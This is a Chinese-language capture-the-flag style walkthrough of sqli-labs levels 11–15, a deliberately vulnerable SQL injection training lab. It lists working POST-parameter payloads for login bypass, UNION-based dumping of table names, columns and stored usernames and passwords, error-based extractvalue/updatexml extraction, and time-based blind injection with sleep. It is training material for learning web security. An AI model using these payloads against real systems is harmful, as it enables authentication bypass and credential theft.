sqli-labs闯关记录(Less11-Less15)

Basic Injection

    • Less-11 Error Based-String
    • Less-12 Error Based-Double
    • Less-13 Double Injection-String-with twist
    • Less-14 Double Injection-Double quotes-String
    • Less-15 Blind-Boolian Based-String

Less-11 Error Based-String

这里是用的post传递参数,所以在url上不会显示数据了,使用burp进行抓包来注入
确认注入点

uname=1' or 1=1 --+

sqli-labs闯关记录(Less11-Less15)_第1张图片
直接爆表

uname=1' union select database(),group_concat(table_name) from information_schema.tables where table_schema="security" --+

sqli-labs闯关记录(Less11-Less15)_第2张图片

爆字段

uname=1' union select database(),group_concat(column_name) from information_schema.columns where table_name='users'  --+

sqli-labs闯关记录(Less11-Less15)_第3张图片
爆数据

uname=1' union select group_concat(username),group_concat(password) from security.users --+

sqli-labs闯关记录(Less11-Less15)_第4张图片

Less-12 Error Based-Double

与Less11不同的是闭合方式不同
sqli-labs闯关记录(Less11-Less15)_第5张图片
根据提示构造闭合

uname=1") or 1=1 #

sqli-labs闯关记录(Less11-Less15)_第6张图片
爆表

uname=1") union select database(),group_concat(table_name) from information_schema.tables where table_schema="security" --+

sqli-labs闯关记录(Less11-Less15)_第7张图片
与Less11一样就不再重复

Less-13 Double Injection-String-with twist

使用updatexml or extractvalue来进行报错注入,也可以使用时间盲注

uname=admin') and extractvalue(1,concat(0x7E,(select database()),0x7E))#

sqli-labs闯关记录(Less11-Less15)_第8张图片

uname=admin') and updatexml(0x7e,concat(0x7e,database(),0x7e,version(),0x7e,user(),0x7e),0x7e)#

sqli-labs闯关记录(Less11-Less15)_第9张图片

Less-14 Double Injection-Double quotes-String

与13不同的是这里只有一个双引号进行闭合
sqli-labs闯关记录(Less11-Less15)_第10张图片`

uname=admin" and extractvalue(1,concat(0x7E,(select database()),0x7E))#`

Less-15 Blind-Boolian Based-String

没有报错注入,可以通过时间盲注来进行
sqli-labs闯关记录(Less11-Less15)_第11张图片

uname=admin' and if(ascii(substr(database(),1,1))=115,sleep(5),1)#

你可能感兴趣的:(靶场练习)